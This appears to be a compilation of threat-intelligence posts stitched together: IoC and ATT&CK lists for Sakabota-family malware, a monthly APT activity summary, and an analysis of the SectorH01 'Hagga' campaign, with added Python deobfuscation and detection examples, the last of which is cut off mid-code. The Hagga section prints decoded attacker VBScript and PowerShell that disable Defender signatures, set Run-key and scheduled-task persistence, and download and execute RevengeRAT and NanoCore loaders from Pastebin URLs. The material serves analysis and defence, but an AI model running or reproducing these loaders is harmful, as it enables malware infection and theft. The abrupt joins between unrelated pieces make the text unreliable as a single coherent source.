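2019-11-13T10:00:10Z host=WS01 proc=C:\Users\u\AppData\Roaming\netero.exe qtype=A qname=g7h8i9.c2-domain.example
2019-11-13T10:00:12Z host=WS01 proc=C:\Users\u\AppData\Roaming\netero.exe qtype=A qname=j0k1l2.c2-domain.example
"""


if __name__ == "__main__":
    for alert in analyze_dns_log(SAMPLE_LOG):
        print(alert)
```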

We believe Gon and the other “Hunter × Hunter” themed malware were branched off from Sakabota (and Diezen) to get around Sakabota’s large file size and eventually compartmentalize the attacker’s various tools into a sort of framework as their capabilities mature.

Indicators of Compromise (IoCs)

Sakabota

Attacker Resources Embedded in Sakabota

CC73D71CC86D9336652A2073AB176B8E3394CCAB95B7B4897724C987656D9AC5
0D7FCD262DF1D8961F2A5A4EBE054A6EFBA42B4156EA64557E05C8F7D29667B5
B2FB0DA6832E554194B59C817922770AF13D474179A1C0381809676EF2709D24
FFE2E9B274B00EA967C96ECA9C177048C35DE75599488F1B8BE5AE1CCEBA00D9
054736B827E07D5E461B0A900AD54B0BCB58BDC23A5C607697A1E6C452B3570D

Legitimate/Gray Resources Embedded in Sakabota

4C8C4E574B9D1DC05257A5C17203570FF6384D031C6E6284FBC0020FE63B719E
5BFA034F7555A38E64C078AF71B4FF8C49511579FA826A87661940B7E9A6E333
04E5F50DD90D5B88B745EF108C06A3EF1E297018CB3FE8ACC80DD55250DFEE68
EA139458B4E88736A3D48E81569178FD5C11156990B6A90E2D35F41B1AD9BAC1
450EBD66BA67BB46BF18D122823FF07EF4A7B11AFE63B6F269AEC9236A1790CD
3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF

Diezen

054736B827E07D5E461B0A900AD54B0BCB58BDC23A5C607697A1E6C452B3570D
0EA5565C15303C56C69BBADEE462E9C63DBD6EE52F00F187E435AF224A48795B
19E3B10056E33FA7559DAF8D9A5104EBB313675A2B4DACA37BAB7DA1A49C2E0F
FF0BD8F8DEE90BA71A491F17B9FDA52C918EF9D3580D562029268A99B7410E19

“Hunter × Hunter” Themed Malware

84122B55E5552AF1752A00F1A268247FECA7E7DBEB4C4CD7B3F5A3005A19FE16
8391C571BFFB3CE538ACE4D8A3388B28EB486CCA5BDAB08AB7B568B4E8FC0EC8
892D5E8E763073648DFEBCFD4C89526989D909D6189826A974F17E2311DE8BC4
3996EFE9A3CF471A1F816287368FA0F99D2CDB95786530B0B61C7B9024FF717B

C2 Domains

pasta58[.]com
firewallsupports[.]com
microsofte-update[.]com

C2 IPs

217[.]79[.]183[.]33
176[.]9[.]235[.]101
213[.]202[.]217[.]31

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1190 Exploit Public-Facing Application

Execution

T1059 Command-Line Interface
T1106 Execution through API
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution
T1061 Graphical User Interface
T1047 Windows Management Instrumentation

Persistence

T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1100 Web Shell
T1078 Valid Accounts

Privilege Escalation

T1100 Web Shell
T1053 Scheduled Task
T1078 Valid Accounts

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1202 Indirect Command Execution
T1112 Modify Registry
T1064 Scripting
T1480 Execution Guardrails
T1107 File Deletion
T1070 Indicator Removal on Host
T1078 Valid Accounts

Credential Access

T1110 Brute Force
T1003 Credential Dumping

Discovery

T1087 Account Discovery
T1482 Domain Trust Discovery
T1010 Application Window Discovery
T1083 File and Directory Discovery
T1046 Network Service Scanning
T1135 Network Share Discovery
T1057 Process Discovery
T1012 Query Registry
T1018 Remote System Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery

Lateral Movement

T1210 Exploitation of Remote Services
T1075 Pass the Hash
T1076 Remote Desktop Protocol
T1105 Remote File Copy
T1021 Remote Services
T1051 Shared Webroot
T1077 Windows Admin Shares

Collection

T1113 Screen Capture
T1005 Data from Local System
T1039 Data from Network Shared Drive

Command and Control

T1043 Commonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding
T1001 Data Obfuscation
T1008 Fallback Channels
T1071 Standard Application Layer Protocol

Exfiltration

T1041 Exfiltration Over Command and Control Channel
T1048 Exfiltration Over Alternative Protocol
T1022 Data Encrypted
T1002 Data Compressed

Monthly Threat Actor Group Intelligence Report, August 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from July 21 to August 20, 2019.

1. SectorA Activity Features

A total of four SectorA hacking groups, SectorA01, SectorA02, SectorA04 and SectorA07, were found active this August. The two parallel requirements of SectorA hacking groups are collecting high-quality information related to South Korean political and diplomatic activities and obtaining illegal monetary benefit by targeting anywhere in the world.

SectorA01 group activity was found in South Korea, the Philippines, Argentina, Pakistan, the United States and Nepal. SectorA02 group activity was found in South Korea and the United States. The SectorA04 group, which had not been seen for a while, was found in South Korea, and its malware was discovered using a digital signature issued by a Korean security company. SectorA07 group activity was found in South Korea, Indonesia, the United States, the Russian Federation and Germany.

The four SectorA-related hacking groups discovered in August all use spear phishing as an attack vector. However, SectorA01 uses Hangul (HWP) files as attachments in South Korea, while the other groups, SectorA02, SectorA04 and SectorA07, use Microsoft Word files containing macros as attachments to their spear phishing emails.

The SectorA02 group produces mobile malware designed to run on Android smartphones and uses it for hacking activities.

The SectorA groups aim to seize high-level information related to South Korea’s political and diplomatic activities and North Korean relief organizations. Due to the large-scale economic sanctions surrounding SectorA, its hacking groups also carry out hacking activities to steal financial information in other countries, including South Korea. These operations take place in parallel, and SectorA groups are expected to continue hacking with these purposes.

2. SectorB Activity Features

Among the SectorB groups, a total of five hacking groups, SectorB01, SectorB03, SectorB04, SectorB06 and SectorB07, were found active this August.

The range of the SectorB01 group’s hacking activity discovered so far has been the widest in the history of this group. Its activity was found in Asia (including South Korea, Japan, Singapore, Vietnam, Malaysia, Hong Kong, Taiwan, Thailand, Myanmar and India), the Middle East (Turkey), Africa (including South Africa), North America (including the United States and Canada) and Europe (including France, the United Kingdom, Ireland, Germany, Switzerland, the Netherlands, Italy, the Czech Republic and Ukraine).

SectorB03 group activity was found in the United Arab Emirates, the United States, Japan and Taiwan.

SectorB04 group activity was found in Russian Federation, United States, United Kingdom, Turkey, Spain, South Korea, Malaysia and Taiwan.

The SectorB06 group has been found in the Russian Federation and Belarus.

SectorB07 group has been found in South Korea, Germany, United States and India.

Most of the SectorB hacking groups use Spear Phishing with document files as attachments to exploit vulnerabilities in Microsoft Office.

The SectorB groups’ hacking activities discovered in August are mostly concentrated in Asia, Europe and North America, and this is closely linked to their efforts to obtain diplomatic and economic information for their country related to its ongoing trade war with the United States.

3. SectorC Activity Features

Among the SectorC groups, the activities of three hacking groups, SectorC02, SectorC03 and SectorC08, were found this August.

The hacking activity of the SectorC02 group has been found in Brazil and Georgia.

The hacking activity of SectorC03 group has been found in United States and United Kingdom.

The hacking activity of SectorC08 group has been found in Ukraine, United Kingdom, Belarus, Sweden, Argentina, United States and China.

The SectorC groups used different attack vectors. The SectorC02 group stole sensitive email information from internal Microsoft Exchange servers connected to the Internet, while the SectorC03 and SectorC08 groups used spear phishing emails with malware as their primary hacking technique, similar to their other hacking activities found in the past.

However, the SectorC08 group has the characteristic of using 7ZipSfx compressed files as attachments to specific hacking targets.

The SectorC groups have many more attack techniques at their disposal than the threat actors of other groups because of their long history. Recently, they have been working to achieve the political objectives of their government, and this is expected to continue.

4. SectorD Activity Features

Among the SectorD groups, the activities of two hacking groups, SectorD02 and SectorD14, were found this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of SectorD14 group has been found in Canada, United States, United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities on Industrial Control Systems (ICS) owned by government agencies, and natural gas and oil companies related to countries located in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group’s government are under way in Western countries, mainly in the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber wars with physical conflicts between the Middle East and Western countries.

5. SectorE Activity Features

Among the SectorE groups, the activities of three hacking groups, SectorE01, SectorE02 and SectorE04, were found this August.

The hacking activity of SectorE01 group was found in Poland, Germany and the United Kingdom.

The hacking activity of the SectorE02 group was found in Pakistan, the United Kingdom, the United States, Ukraine, the Netherlands and Germany.

The hacking activity of SectorE04 was found in China.

SectorE hacking groups have mainly been conducting hacking activities targeting countries that are politically competitive with SectorE group’s government, but the range of geographical hacking activities of these groups is gradually widening.

The hacking groups discovered in August mainly used spear phishing, attaching document files that exploited known Microsoft Word vulnerabilities or containing malicious macro code.

The SectorE groups are expanding their range of activity, and their recent activities have been found frequently in East Asia. In addition, it is highly likely that they will continue to develop new hacking techniques by copying techniques of other hacking groups or through their own research process.

6. SectorF Activity Features

August hacking activity of the SectorF01 group has been found in Cambodia, China, South Korea, Japan, United States, Ireland, Russian Federation, and Australia. They used malware that is highly similar to the ones found in the past, and spear phishing emails with document files containing malicious macro code as attachments are sent to their targets.

In the past, their hacking activity has often been discovered in the Southeast Asia region, and recently their hacking activities have been carried out for the purpose of the economic development of their country. The radius of this group’s hacking activity is expected to gradually increase, and it is necessary to continue further analysis based on their hacking activity areas and targets.

7. Cyber Crime Activity Features

In August, a total of six hacking groups, SectorJ01, SectorJ04, SectorJ07, SectorJ10, SectorJ12 and SectorJ13, were found among the Cyber Crime Groups. Unlike other government-backed hacking groups, they collect information such as Credit Card information that can be monetized in the real world. They also hack organizations to spread ransomware on their internal network, or steal important industry secrets to sell them online.

The hacking activity of SectorJ01 group has been found in the Russian Federation, Romania, United Kingdom, Costa Rica and United States. The SectorJ01 Group is conducting hacking campaigns in Europe and North America this August. They collect various types of personal and corporate information that exists inside infected PCs from malware distributed through the spear phishing email.

The hacking activity of SectorJ04 group has been found in United Kingdom, United States, South Korea, Germany, Turkey, France, Bulgaria, Serbia, India, Canada, Argentina, Bangladesh and Hong Kong. They mainly hack into companies in various industries including transportation, universities, government agencies, manufacturing, semiconductors, online commercials, chemicals, and health. In the first half of 2019, they intensively hacked organizations in Asia, but their recent trend seems to be to move hacking activity back to Europe and North America.

The hacking activity of SectorJ07 group has been found in China, United States and Ukraine. They mainly produce malware that runs on Linux that can mine cryptocurrencies on high-performance servers utilized by companies.

The hacking activity of SectorJ10 group has been found in Philippines and United States. Attacks are carried out using spear phishing emails containing malware in the form of document files which have malicious macro code included inside. The macro calls to the Windows Management Instrumentation Command-line (WMIC), and the WMIC finally executes a malicious PowerShell script.

The SectorJ12 group conducted hacking activities targeting energy, entertainment, consulting and manufacturing companies located in France, Taiwan and Poland. The spear phishing emails have an ACE archive attached, and this ACE archive contains a Visual Basic Script (VBScript) for getting the malicious PowerShell script from the attacker’s server.

The hacking activity of SectorJ13 group has been found in South Korea, Ukraine and United Kingdom. They send spear phishing emails with document files containing malicious macro code attached. When executing the Word document, the macro script uses a technique to download additional malware from the attacker’s server by running PowerShell. SectorJ13 was previously only active in Europe, but its activity was recently found in Korea as well. This is a group that needs to be watched closely if it is targeting South Korea with similar intent and purpose as the SectorJ04 group.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Hagga of SectorH01 continues abusing Bitly, Blogger and Pastebin to deliver RevengeRAT and NanoCore

Overview

“Hagga” is the username of a Pastebin account used since December last year by a known, pervasive group of threat actors which targets thousands of users around the world, for both cyber espionage and cyber crime purposes, using malspam. Their activities were first discovered in 2017, and the ThreatRecon Team tracks both this group and the members behind “Hagga” collectively as the SectorH01 group.

Since their activities were first discovered, they have been observed using a variety of commodity malware spread from the same hosts and communicating with the same C2 addresses. Some of the commodity malware used in the past includes RevengeRAT and NanoCore, which they are still using today.

SectorH01 Group Attack Lifecycle

Their Targeting

Sectors the SectorH01 group has been observed targeting since discovery, likely for intelligence purposes:

  • Defense
  • Dissidents
  • Governments
  • Military

Sectors the SectorH01 group has been observed targeting since discovery, likely for criminal purposes:

  • Agriculture
  • Food
  • Hospitality
  • Manufacturing
  • News Media
  • Shipping
  • Tourism
  • Trade

Countries the SectorH01 group has been observed targeting for this event:

  • United States
  • United Kingdom
  • Latvia
  • France
  • Germany
  • India
  • Japan
  • South Korea
  • Taiwan
  • Thailand
  • Turkey
  • Vietnam

The targets of the malware in this blog post, from June to September, appear to have been chosen purely for criminal activity: enterprise users, the majority of whom are based in the United States.

The Phish

The SectorH01 group sends phishing emails to their targets with subjects related to payments, such as purchase orders, invoices, requests for quotation, telegraphic transfer confirmation documents, or overdue payments. To these emails they attach file(s) related to the email contents in the form of Excel XLS, Microsoft Word DOC/DOCX, RTF, and ZIP files.

Sample Excel File (b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d)

In the case of Excel XLS files, they have in recent months been using simply obfuscated VBA macros which execute mshta.exe against a Bitly shortened link that redirects to a Google Blogger (blogspot) link.

VBA Macro which executes mshta.exe embedded in malicious XLS file

The Blogger page looks benign but has obfuscated JavaScript hidden in its source code. This pattern of obfuscating JavaScript is used extensively not only on the Blogger page but also on Pastebin, where it is layered multiple times and eventually decodes to various VBScript scripts which are run by the mshta.exe utility.

SectorH01 commonly uses multiple layers of the same encoding for its Pastebin scripts

By performing the same decoding on the JavaScript code, we get the VBScript, which performs multiple tasks such as terminating processes and setting persistence.

Example Decoded Script
<script language="VBScript">
Set X7W832DSA = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim ASSd712ji8asd
ASSd712ji8asd = "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit"
X7W832DSA.Run ASSd712ji8asd, vbHide
Set X_ws = CreateObject("WScript.Shell")
Pa_2da = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate"
X_ws.RegWrite Pa_2da,"mshta.exe http://pastebin.com/raw/2gY9SAwU","REG_EXPAND_SZ"
Set Mi_G = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim X_hw
X_hw0 = StrReverse("t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs")
X_hw1 = "n ""Avast Updater"" /tr ""mshta.ex"
X_hw2 = "e h" + "t" + "t" + "p" + ":" + "/" + "/" + "p" + "a" + "s" + "t" + "e" + "b" + "i" + "n" + "." + "c" + "o" + "m" + "/" + "r" + "a" + "w" + "/qZXnhtQG"" /F "
X_hw = X_hw0 + X_hw1 + X_hw2
Mi_G.Run X_hw, vbHide
Set Ox_xw = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim P_wx
P_wx0 = StrReverse("t/ 003 om/ ETUNIM cs/ etaerc/ sksathcs")
P_wx1 = "n ""Avast backup"" /tr ""mshta.ex"
P_wx2 = "e h" + "t" + "t" + "p" + ":" + "/" + "/" + "p" + "a" + "s" + "t" + "e" + "b" + "i" + "n" + "." + "c" + "o" + "m" + "/" + "r" + "a" + "w" + "/Htp0LKHg"" /F "
P_wx = P_wx0 + P_wx1 + P_wx2
Ox_xw.Run P_wx, vbHide
self.close
</script>

Going into one of the scheduled tasks, we see more encoded text.

Example First-Layer Decoded Scheduled Task
<script language="VBScript">
Set EAsxw = CreateObject(StrReverse("llehS.tpircSW"))
Dim Xsks
Xsks = StrReverse("XEI|)OLOL$(gnirtSteG.IICSA::]gnidocnE.txeT.metsyS[;)14,201,63,44,93,101,021,101,64,001,801,501,711,66,38,77,93,04,101,021,101,85,85,39,211,711,611,501,701,99,79,27,64,701,19,95,88,96,37,421,14,93,021,84,93,44,93,33,46,53,93,04,101,99,79,801,211,101,411,64,14,93,84,67,88,68,711,35,101,84,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,201,63,39,39,19,101,611,121,66,19,95,88,96,37,421,14,93,98,27,121,711,17,56,15,94,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,601,201,63,95,14,93,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,93,04,101,901,79,87,801,79,501,611,411,79,08,401,611,501,78,001,79,111,67,85,85,39,121,801,89,901,101,511,511,56,64,011,111,501,611,99,101,801,201,101,28,64,901,101,611,511,121,38,19,23,39,001,501,111,811,19(@=OLOL$")
X_WRc = StrReverse("P") + StrReverse("o") + StrReverse("w") + StrReverse(StrReverse(StrReverse(StrReverse("e")))) + StrReverse("r") + StrReverse("s") + StrReverse("h") + StrReverse(StrReverse(StrReverse(StrReverse("e")))) + StrReverse(StrReverse("l")) + StrReverse(StrReverse("l")) + StrReverse(".") + StrReverse(StrReverse(StrReverse(StrReverse("e")))) + StrReverse("x") + StrReverse(StrReverse(StrReverse(StrReverse("e")))) + Space(1) + Xsks
EAsxw.Run X_WRc, vbHide
self.close
</script>

Finally, further decoding shows it loading different malware from two Pastebin sites, which are again obfuscated.

Example Second-Layer Decoded Scheduled Task
[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/13AGuyHY')|IEX;
[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/0e5uVXL0').replace('#@!','0x')|IEX;
[k.Hackitup]::exe('MSBuild.exe',$f)

At other times, the decoded scripts make use of .NET Reflection.

Example of .NET Reflection in Decoded Script
do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/QppWFhGC')|IEX;
[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/Q8g1d6Be').replace(')&*^','0x')|IEX;
$obj =@('MSBuild.exe',$f);
$g22=$a.GetType('THC452563sdfdsdfgr4777cxg04477fsdf810df777');
$y=$g22.GetMethod('retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe');
$j=[Activator]::CreateInstance($g22,$null);
$y.Invoke($j,$obj)
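The string-building tricks in the decoded scripts above (StrReverse, one-character-at-a-time concatenation, doubled-quote escapes, and the reversed `$LOLO=@(...)` character-code array in the first-layer scheduled task) are all reversible without running the script. As an added example that is not code from the original post or the ThreatRecon team, the Python below emulates just those VBScript string operations, records what each `.Run` and `.RegWrite` call would do, and then unwraps the character-code array into the PowerShell it hides. The two sample scripts inside it are constructed to mirror the layouts shown above; `PASTEID0`, `PASTEID1` and `PASTEID2` are placeholders, not the real paste names, and `obfuscate_like_page` exists only to build the second sample.

```python
import re

STRREV_RE = re.compile(r"^StrReverse\((.*)\)$", re.S)
ASSIGN_RE = re.compile(r"^(\w+)\s*=\s*(.+)$")
RUN_RE = re.compile(r"^\w+\.Run\s+(\w+)\s*,", re.I)
REGWRITE_RE = re.compile(r"^\w+\.RegWrite\s+(.+)$", re.I)
CHAR_ARRAY_RE = re.compile(r"@\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")


def split_top_level(expr, sep):
    """Split on sep, ignoring separators inside "..." literals (with "" escapes) or parentheses."""
    parts, cur, depth, in_str, i = [], [], 0, False, 0
    while i < len(expr):
        ch = expr[i]
        if ch == '"' and in_str and expr[i + 1:i + 2] == '"':
            cur.append('""')  # doubled quote inside a literal is an escaped quote, not the end
            i += 2
            continue
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            depth += (ch == "(") - (ch == ")")
            if ch == sep and depth == 0:
                parts.append("".join(cur))
                cur = []
                i += 1
                continue
        cur.append(ch)
        i += 1
    parts.append("".join(cur))
    return parts


def eval_expr(expr, env):
    return "".join(eval_term(t.strip(), env) for t in split_top_level(expr, "+"))


def eval_term(term, env):
    if term.startswith('"') and term.endswith('"'):
        return term[1:-1].replace('""', '"')
    m = STRREV_RE.match(term)
    if m:  # nested StrReverse(StrReverse(...)) just recurses
        return eval_expr(m.group(1), env)[::-1]
    if term.lower() == "space(1)":
        return " "
    if term in env:
        return env[term]
    raise ValueError(f"unsupported term: {term!r}")


def emulate_vbscript(script):
    """Evaluate the string assignments and collect what .Run / .RegWrite would have done."""
    env, actions = {}, []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.lower().startswith(("dim ", "set ", "<script", "</script", "self.close")):
            continue
        m = RUN_RE.match(line)
        if m:
            actions.append(("Run", env[m.group(1)]))
            continue
        m = REGWRITE_RE.match(line)
        if m:
            key, value = (eval_expr(a, env) for a in split_top_level(m.group(1), ",")[:2])
            actions.append(("RegWrite", f"{key} = {value}"))
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = eval_expr(m.group(2), env)
    return env, actions


def decode_char_array(powershell):
    """Turn a $LOLO=@(n,n,...) character-code array back into the script it hides."""
    m = CHAR_ARRAY_RE.search(powershell)
    return "".join(chr(int(n)) for n in m.group(1).split(",")) if m else None


def obfuscate_like_page(payload):
    """Constructed helper: wrap a payload in the char-array form seen above, reversed for StrReverse."""
    codes = ",".join(str(ord(c)) for c in payload)
    return f"$LOLO=@({codes});[System.Text.Encoding]::ASCII.GetString($LOLO)|IEX"[::-1]


# Constructed sample modelled on the persistence script above (placeholder paste IDs)
SAMPLE_PERSISTENCE_VBS = r'''Set X_ws = CreateObject("WScript.Shell")
Pa_2da = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate"
X_ws.RegWrite Pa_2da,"mshta.exe http://pastebin.com/raw/PASTEID0","REG_EXPAND_SZ"
Set Mi_G = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim X_hw
X_hw0 = StrReverse("t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs")
X_hw1 = "n ""Avast Updater"" /tr ""mshta.ex"
X_hw2 = "e h" + "t" + "t" + "p" + ":" + "/" + "/" + "p" + "a" + "s" + "t" + "e" + "b" + "i" + "n" + "." + "c" + "o" + "m" + "/" + "r" + "a" + "w" + "/PASTEID1"" /F "
X_hw = X_hw0 + X_hw1 + X_hw2
Mi_G.Run X_hw, vbHide'''

# Constructed sample modelled on the first-layer scheduled task above
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/PASTEID2')"
SAMPLE_TASK_VBS = (
    'Set EAsxw = CreateObject(StrReverse("llehS.tpircSW"))\nDim Xsks\n'
    'Xsks = StrReverse("' + obfuscate_like_page(PAYLOAD) + '")\n'
    'X_WRc = StrReverse("P") + StrReverse("o") + StrReverse("w") + StrReverse(StrReverse("e")) '
    '+ "rshell.exe" + Space(1) + Xsks\nEAsxw.Run X_WRc, vbHide'
)


def decode_first_layer_task(vbs):
    """Recover the PowerShell hidden inside a first-layer scheduled-task script."""
    _, actions = emulate_vbscript(vbs)
    return decode_char_array(actions[-1][1])  # last Run is "Powershell.exe $LOLO=@(...)..."


if __name__ == "__main__":
    for kind, what in emulate_vbscript(SAMPLE_PERSISTENCE_VBS)[1]:
        print(kind, what)
    print(decode_first_layer_task(SAMPLE_TASK_VBS))
```

The emulator deliberately understands only string literals, `+`, `StrReverse`, `Space(1)` and variable references, and raises on anything else; a deobfuscator that silently skips unknown constructs is how analysts end up with a plausible-looking but wrong decoding, so failing loudly on a new trick is the safer default.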

After looking at the various scripts used, we observed the obfuscated JavaScript code mainly serving one or more of these purposes:

  • Terminating Microsoft Office processes winword.exe, excel.exe, MSPUB.exe, POWERPNT.exe, and sometimes Windows Defender processes MSASCuiL.exe and MpCmdRun.exe
  • Interfering with Windows Defender via command “MpCmdRun.exe -removedefinitions -dynamicsignatures”
  • Setting Registry Autorun Persistence to execute mshta.exe on a Pastebin url
  • Setting Scheduled Task Persistence to execute mshta.exe on a Pastebin url
  • Executing malware in memory, sometimes in Microsoft’s .NET MSBuild.exe

In most cases, the SectorH01 group in fact performed all of the above, sometimes several at once by stacking multiple Pastebin URLs and multiple commands in a single URL. Moreover, since the SectorH01 group is using the “Hagga” Pastebin account, which has the ability to edit the user’s pastes, they at times modify a paste to perform different actions. Below is the attack flow using this sample Excel file as an example.

Attack flow (each site, followed by the action it performs):

Site: www[.]bitly[.]com/adsodeasda
Action: Redirect to https://xasjow21d[.]blogspot.com/p/14[.]html

Site: https://xasjow21d[.]blogspot.com/p/14[.]html
Action: mshta.exe http://www[.]pastebin[.]com/raw/8uJavttD

Site: http://www[.]pastebin[.]com/raw/8uJavttD
Actions:
  (1) MpCmdRun.exe -removedefinitions -dynamicsignatures
  (2) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe / MSASCuiL.exe / MpCmdRun.exe
  (3) Run https://pastebin[.]com/raw/7EdEuebH via PowerShell
  (4) Run http://pastebin[.]com/raw/ri21rHbF via mshta.exe

Site: http://pastebin[.]com/raw/ri21rHbF
Action: Deobfuscates to RevengeRAT (CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856)

Site: http://pastebin[.]com/raw/ri21rHbF [Paste Edit 1]
Actions:
  (1) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe
  (2) Set Registry Autorun Persistence to execute mshta.exe http://pastebin[.]com/raw/2gY9SAwU
  (3) Set Scheduled Task Persistence to execute mshta.exe http://pastebin[.]com/raw/qZXnhtQG
  (4) Set Scheduled Task Persistence to execute mshta.exe http://pastebin[.]com/raw/Htp0LKHg

Site: http://pastebin[.]com/raw/ri21rHbF [Paste Edit 2]
Actions:
  (1) ping Google
  (2) Run https://pastebin[.]com/raw/QppWFhGC via Reflection
  (3) Run https://pastebin[.]com/raw/Q8g1d6Be with replace(')&*^','0x') via Reflection

Site: http://pastebin[.]com/raw/2gY9SAwU
Action: Self.close()

Site: http://pastebin[.]com/raw/qZXnhtQG
Actions:
  (1) Execute https://pastebin[.]com/raw/13AGuyHY via Reflection
  (2) Execute k.Hackitup() in https://pastebin[.]com/raw/0e5uVXL0 with replace('#@!','0x') via Reflection

Site: http://pastebin[.]com/raw/Htp0LKHg
Action: Self.close()

Site: https://pastebin[.]com/raw/QppWFhGC
Action: Deobfuscates to a code injector (E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393), obfuscated with ConfuserEx

Site: https://pastebin[.]com/raw/Q8g1d6Be
Action: Deobfuscates to NanoCore (E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E), obfuscated with Eazfuscator

Site: https://pastebin[.]com/raw/13AGuyHY
Action: Deobfuscates to a code injector (84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6), obfuscated with ConfuserEx

Site: https://pastebin[.]com/raw/0e5uVXL0
Action: Deobfuscates to NanoCore (94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197), obfuscated with Eazfuscator
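Every step in the flow above leaves a host-side artefact that is cheap to watch for: mshta.exe launched with a URL, a scheduled task or Run-key value whose action is a script host pointed at a URL, MpCmdRun.exe invoked with -removedefinitions, and MSBuild.exe spawned by PowerShell. As an added example, not detection content from the original post or the ThreatRecon team, the Python below runs those checks over Sysmon-style process and registry events. The events are constructed for this example (the paste names are the ones listed in the flow above, the file paths are the standard Windows locations), the rule names are invented here, and the ATT&CK IDs attached to each hit are the ones the post's own technique list uses.

```python
import re

URL_RE = re.compile(r"https?://", re.I)
TR_RE = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)  # the /tr action of schtasks /create
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe", "outlook.exe"}

# Constructed events modelled on the attack flow above; "image"/"parent" are Sysmon-like fields
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://pastebin.com/raw/8uJavttD", "parent": "EXCEL.EXE"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc MINUTE /mo 30 /tn "Avast Updater" '
                '/tr "mshta.exe http://pastebin.com/raw/qZXnhtQG" /F',
     "parent": "mshta.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate",
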